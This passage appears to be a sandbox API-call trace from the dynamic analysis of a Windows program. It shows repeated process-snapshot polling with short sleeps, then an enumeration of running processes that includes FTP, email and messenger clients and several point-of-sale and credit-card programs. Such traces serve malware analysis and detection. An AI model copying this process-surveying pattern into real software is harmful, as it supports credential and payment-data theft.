th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.078] Sleep (dwMilliseconds=0x64) [0204.115] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0204.129] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.298] Sleep (dwMilliseconds=0x64) [0204.341] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0204.412] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.566] Sleep (dwMilliseconds=0x64) [0204.605] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0204.617] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.771] Sleep (dwMilliseconds=0x64) [0204.822] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0204.877] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.095] Sleep (dwMilliseconds=0x64) [0205.150] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0205.161] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.332] Sleep (dwMilliseconds=0x64) [0205.368] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0205.387] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.509] Sleep (dwMilliseconds=0x64) [0205.557] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0205.571] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.778] Sleep (dwMilliseconds=0x64) [0205.846] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2298 [0205.944] Process32First (in: hSnapshot=0x2298, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.171] Sleep (dwMilliseconds=0x64) [0206.293] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0206.312] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.510] Sleep (dwMilliseconds=0x64) [0206.557] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0206.608] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.837] Sleep (dwMilliseconds=0x64) [0206.874] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0206.891] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.093] Sleep (dwMilliseconds=0x64) [0207.133] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0207.183] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.350] Sleep (dwMilliseconds=0x64) [0207.439] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0207.455] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.754] Sleep (dwMilliseconds=0x64) [0207.887] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0207.899] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.141] Sleep (dwMilliseconds=0x64) [0208.180] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0208.194] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.344] Sleep (dwMilliseconds=0x64) [0208.384] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0208.451] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.729] Sleep (dwMilliseconds=0x64) [0208.769] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0208.781] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.051] Sleep (dwMilliseconds=0x64) [0209.096] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0209.114] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.286] Sleep (dwMilliseconds=0x64) [0209.324] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0209.375] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.541] Sleep (dwMilliseconds=0x64) [0209.579] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0209.595] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.752] Sleep (dwMilliseconds=0x64) [0209.820] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0209.871] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.052] Sleep (dwMilliseconds=0x64) [0210.091] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0210.107] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.252] Sleep (dwMilliseconds=0x64) [0210.295] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0210.350] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.562] Sleep (dwMilliseconds=0x64) [0210.602] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0210.619] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.777] Sleep (dwMilliseconds=0x64) [0210.824] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0210.887] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.106] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0211.108] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0211.110] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0211.112] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0211.116] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0211.118] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0211.120] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0211.122] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0211.125] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0211.127] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0211.129] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0211.132] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0211.134] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0211.135] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0211.138] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0211.140] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0211.142] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0211.187] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0211.189] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0211.191] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0211.193] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0211.195] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0211.197] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0211.199] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0211.201] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0211.203] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0211.205] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0211.207] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0211.209] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0211.211] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0211.213] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0211.219] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0211.222] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0211.225] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0211.265] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0211.267] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0211.270] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0211.272] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0211.274] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0211.276] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0211.278] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0211.280] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0211.281] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0211.284] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0211.285] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0211.287] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0211.289] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 